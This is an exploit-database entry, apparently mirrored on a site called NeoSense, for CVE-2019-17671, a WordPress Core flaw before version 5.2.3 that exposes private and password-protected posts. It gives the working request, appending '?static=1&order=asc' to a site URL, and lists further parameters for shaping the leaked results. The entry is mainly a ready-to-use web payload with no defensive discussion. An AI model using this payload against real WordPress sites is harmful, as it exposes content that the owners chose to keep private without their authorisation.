[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts

Author: Sebastian Neef
type: webapps
platform: multiple
port: 
date_added: 2019-11-19 
date_updated: 2019-11-19 
verified: 0 
codes: CVE-2019-17671 
tags: 
aliases:  
screenshot_url:  
application_url: 
So far we know that adding `?static=1` to a wordpress URL should leak its secret content

Here are a few ways to manipulate the returned entries:

- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format


In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.